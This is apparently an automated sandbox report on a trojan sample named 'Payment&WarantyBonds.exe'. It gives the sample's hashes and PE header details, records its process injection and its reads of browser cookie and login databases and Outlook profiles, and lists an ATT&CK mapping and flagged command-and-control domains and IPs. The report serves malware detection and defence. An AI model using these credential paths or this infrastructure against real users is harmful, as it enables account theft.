                Source: Yara match | File source: 00000002.00000002.2021577870.0000000001740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.4106735496.0000000004570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2020861134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.4108148789.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.4106690765.0000000004520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4106710053.00000000041D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2022730147.00000000031C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\systeminfo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\systeminfo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\systeminfo.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\systeminfo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\systeminfo.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\systeminfo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\systeminfo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\systeminfo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\systeminfo.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match | File source: 2.2.Payment&WarantyBonds.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.Payment&WarantyBonds.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000002.00000002.2021577870.0000000001740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.4106735496.0000000004570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2020861134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.4108148789.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.4106690765.0000000004520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4106710053.00000000041D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2022730147.00000000031C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 114 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                [Behavior graph. ID: 1545791, Sample: Payment&WarantyBonds.bat, Startdate: 31/10/2024, Architecture: WINDOWS, Score: 100. Process chain: Payment&WarantyBonds.exe (started) -> Payment&WarantyBonds.exe (started) -> lVlYtqLlYCJP.exe (injected) -> systeminfo.exe (started) -> lVlYtqLlYCJP.exe (injected) and firefox.exe (started).]

                Source | Detection | Scanner | Label | Link
                Payment&WarantyBonds.exe | 46% | ReversingLabs | Win32.Trojan.Leonem |
                Payment&WarantyBonds.exe | 40% | Virustotal | | Browse
                Payment&WarantyBonds.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                                                                                                                                unknown
                                                                                                                                https://www.west.cn/ykj/view.asp?domain=cotti.clubsysteminfo.exe, 00000007.00000002.4108897499.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  http://www.fonts.comPayment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://www.sandoll.co.krPayment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://www.urwpp.deDPleasePayment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://www.zhongyicts.com.cnPayment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://www.piensasolutions.com?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=piensasysteminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    http://www.sakkal.comPayment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    https://www.piensasolutions.com/crear-web?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=wesysteminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      https://shop.piensasolutions.com/search-ajax.php?utm_source=parking&amp;utm_medium=link&amp;utm_campsysteminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        http://www.extrime1.shoplVlYtqLlYCJP.exe, 00000008.00000002.4108148789.0000000004AD4000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          https://www.strato.delVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002D48000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            http://www.apache.org/licenses/LICENSE-2.0Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              http://www.fontbureau.comPayment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://piensasolutions.com/imgs/parking/icon-ssl-parking.pngsysteminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                https://www.west.cn/services/webhosting/systeminfo.exe, 00000007.00000002.4108897499.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://plus.google.com/u/0/102310483732773374239systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    https://www.west.cn/services/domain/systeminfo.exe, 00000007.00000002.4108897499.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=systeminfo.exe, 00000007.00000002.4109041108.0000000007848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg)systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://www.ecosia.org/newtab/systeminfo.exe, 00000007.00000002.4109041108.0000000007848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://piensasolutions.com/imgs/parking/icon-hosting.pngsysteminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://piensasolutions.com/imgs/parking/icon-web.pngsysteminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            http://www.carterandcone.comlPayment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://ac.ecosia.org/autocomplete?q=systeminfo.exe, 00000007.00000002.4109041108.0000000007848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            http://www.fontbureau.com/designers/cabarga.htmlNPayment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://www.piensasolutions.com/web-sencilla?utm_source=parking&amp;utm_medium=link&amp;utm_campaignsysteminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              http://www.founder.com.cn/cnPayment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://www.fontbureau.com/designers/frere-user.htmlPayment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://www.piensasolutions.com/dominios?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=domsysteminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                https://www.piensasolutions.com/hosting?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=hostsysteminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://piensasolutions.com/imgs/parking/icon-parking.pngsysteminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://www.west.cn/jiaoyi/systeminfo.exe, 00000007.00000002.4108897499.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      http://www.jiyu-kobo.co.jp/Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://piensasolutions.com/imgs/parking/icon-facebook-small.pngsysteminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        http://www.fontbureau.com/designers8Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        https://piensasolutions.com/imgs/parking/icon-twitter-small.pngsysteminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=systeminfo.exe, 00000007.00000002.4109041108.0000000007848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          https://twitter.com/piensasolutionssysteminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            https://piensasolutions.com/imgs/parking/icon-web-sencilla.pngsysteminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                              • 75% < No. of IPs
IP, Domain, Country, Flag, ASN, ASN Name, Malicious
                                                                                                                                                                              152.42.255.48
                                                                                                                                                                              extrime1.shopUnited States
                                                                                                                                                                              81NCRENUStrue
                                                                                                                                                                              217.76.156.252
                                                                                                                                                                              www.cesach.netSpain
                                                                                                                                                                              8560ONEANDONE-ASBrauerstrasse48DEtrue
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1545791
Start date and time: 2024-10-31 01:36:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 36s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Payment&WarantyBonds.exe (renamed file extension from bat to exe)
Original Sample Name: Payment&WarantyBonds.bat
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@15/14
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 96
• Number of non-executed functions: 257
Cookbook Comments:
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
Time      Type             Description
20:37:04  API Interceptor  1x Sleep call for process: Payment&WarantyBonds.exe modified
20:38:12  API Interceptor  10968576x Sleep call for process: systeminfo.exe modified
                                                                                                                                                                              MICROSOFT-CORP-MSN-AS-BLOCKUSfile.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                              • 20.96.153.111
                                                                                                                                                                              Arquivo_4593167.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                              • 40.119.152.241
                                                                                                                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                              • 20.189.173.26
                                                                                                                                                                              Paiement.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 40.126.32.138
                                                                                                                                                                              https://share.hsforms.com/11zbkP7dfTBO0LgTS5dCN0Asixz3Get hashmaliciousMamba2FABrowse
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              Access Audits -System #6878.msgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 104.47.64.28
                                                                                                                                                                              https://app.pandadoc.com/document/v2?token=abf6587d58630a40e08d0ad15de8202e2e9c4af5Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 150.171.27.10
                                                                                                                                                                              (No subject) (100).emlGet hashmaliciousTycoon2FABrowse
                                                                                                                                                                              • 104.47.64.28
                                                                                                                                                                              https://irs-ci.secureemailportal.com/s/e?m=ABDvX2xiE1DvdsTP333wt4Qp&c=ABDsD05ZNJ23bCjfjm6gXjJS&em=publicrecords%40marionfl.orgGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 13.107.42.14
                                                                                                                                                                              Reminders for Msp-partner_ Server Alert.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 150.171.27.10
                                                                                                                                                                              No context
                                                                                                                                                                              No context
                                                                                                                                                                              Process:C:\Users\user\Desktop\Payment&WarantyBonds.exe
                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1216
                                                                                                                                                                              Entropy (8bit):5.34331486778365
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:high, very likely benign file
                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                                              Process:C:\Windows\SysWOW64\systeminfo.exe
                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):114688
                                                                                                                                                                              Entropy (8bit):0.9746603542602881
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:high, very likely benign file
                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Entropy (8bit):7.950809546708747
                                                                                                                                                                              TrID:
                                                                                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                              • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                              File name:Payment&WarantyBonds.exe
                                                                                                                                                                              File size:764'928 bytes
                                                                                                                                                                              MD5:a9da1b42f6ad80ee6085f69e6c25f49b
                                                                                                                                                                              SHA1:e7f51c3eb496a278999fd893e1fcfca8a685f854
                                                                                                                                                                              SHA256:4e6fe41b2158546ebc7d5dcfe13aa832e3ce5025b36e0cfcc9d7f373e1a0a089
                                                                                                                                                                              SHA512:da5a50aee37e977f3af7bd7af90d91245d42197978d9a8b016558989d6999a1448d44095b61b164fa7a2f7374b338e29cf0efe3be40a125f782930898dca8162
                                                                                                                                                                              SSDEEP:12288:H8aDPw1Qk89Tmyij4kIqGNlSq8UMb7SmUdiJEYqXmSEwILV4C4BWpDatCEftp2uF:HdLw9gTFsOqGHFqvUwJEYJSEp4C44pDa
                                                                                                                                                                              TLSH:5DF4238273EE4711D47E6BF52EA2164453B66749092BF66C4FAC00CC6FA6B004D5AF1B
                                                                                                                                                                              Icon Hash:4bd4d4d4d4d6d629
                                                                                                                                                                              Entrypoint:0x4bafda
                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                              Time Stamp:0x6721A484 [Wed Oct 30 03:14:12 2024 UTC]
                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                              OS Version Major:4
                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                              File Version Major:4
                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                              Instruction
                                                                                                                                                                              jmp dword ptr [00402000h]
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
